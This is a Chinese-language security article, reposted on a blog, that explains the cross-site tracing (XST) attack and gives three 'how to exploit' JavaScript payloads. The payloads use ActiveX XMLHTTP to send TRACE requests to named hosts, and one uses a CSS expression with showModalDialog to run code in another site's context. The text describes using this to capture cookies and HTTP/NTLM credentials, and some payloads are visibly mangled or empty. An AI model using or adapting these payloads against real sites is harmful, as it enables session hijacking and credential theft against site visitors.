cross-site tracing XST攻击

文章作者：swords [E.S.T]
信息来源：邪恶八进制信息安全团队（www.evilocta.com）

注意：文章已经发表于8期黑客防线，版权归其所

XST攻击描述：
攻击者将恶意代码嵌入一台已经被控制的主机上的web文件，当访问者浏览时恶意代码在浏览器中执行，然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机，同时传送Trace请求给目标主机，导致cookie欺骗或者是中间人攻击。

XST攻击条件：
1、需要目标web服务器允许Trace参数；
2、需要一个用来插入XST代码的地方；
3、目标站点存在跨域漏洞。

XST与XSS的比较:
相同点：都具有很大的欺骗性，可以对受害主机产生危害，而且这种攻击是多平台多技术的，我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
优点：可以绕过一般的http验证以及NTLM验证

如何利用：

手法1：
<SCRIPT type=text/java script> <!-- function xssTRACE(){ var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\"); xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false); xmlHttp.send(); xmlDoc=xmlHttp.responseText; alert(xmlDoc); }

//--> </SCRIPT> <BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">

手法2：
<SCRIPT type=text/java script>  </SCRIPT> <BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">

手法3：
<SCRIPT type=text/java script> function xssTRACE(){ var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"http://http://www.tingh.com/\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\"; var target = \"http://wmjie.51.net/swords/\"; spinach = encodeURIComponent(swords + ';top.close()'); var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))'; showModalDialog(target, null, readyCode); } </SCRIPT> <BR><INPUT onclick=xssTRACE() type=button value=\"XSS TRACE\">

后记：研究阶段，希望能抛砖引玉，期望和您能够交流心得体会。
Once you have some questions,you can contract me. http://angler.126.com

鬼仔's Blog

抢楼还有机会... 抢座、Rss 2.0或者 Trackback

发表评论

分类

最新日志

最新评论

鬼仔's Blog